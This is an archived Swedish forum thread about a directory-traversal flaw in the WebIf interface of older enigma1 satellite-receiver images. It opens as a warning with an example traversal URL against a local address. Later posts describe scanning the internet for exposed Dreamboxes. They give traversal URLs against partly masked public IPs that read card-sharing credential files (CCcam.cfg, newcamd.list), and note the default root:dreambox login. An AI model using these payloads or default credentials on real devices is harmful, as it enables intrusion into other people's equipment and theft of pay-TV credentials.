handdator

Visa fullständig version : Varning för WebIf exploit i enigma1



Leatherface
2008-12-07, 14:34
En bugg i alla enigma1 images före 11 Nov 2008 gör det möjligt att komma åt alla filer i boxen...

ett exempel:
http://192.168.0.100//%2f..%2f..%2f..%2f..%2f..%2f..%2fvar/tuxbox/config/enigma/config

amkoo
2008-12-07, 14:39
E de farligt nåt eller?

Leatherface
2008-12-07, 14:45
Bara om man har den åtkomlig utanför lokala nätverket....
Har man den öppen utåt mot nätet kan vem som helst ta kontroll över boxen...
Eller ladda ner fler för softcams t.ex och på så sätt komma åt lösenord för att se på kanaler gratis...

maximus
2009-06-24, 20:26
Rena kalaset ute på nätet med alla oskyddade dreamboxar. Angry ip scanner hittar en massa dreamboxar. h_ttp://85.226.xx.xx//%2f..%2f..%2f..%2f..%2f..%2f..%2fvar/etc/CCcam.cfg h_ttp://85.226.xx.xx//%2f..%2f..%2f..%2f..%2f..%2f..%2fvar/keys/newcamd.list mvh Dickus

Leatherface
2009-06-24, 20:50
och har dom inte gammal image så kommer man in med root:dreambox som login ofta istället :)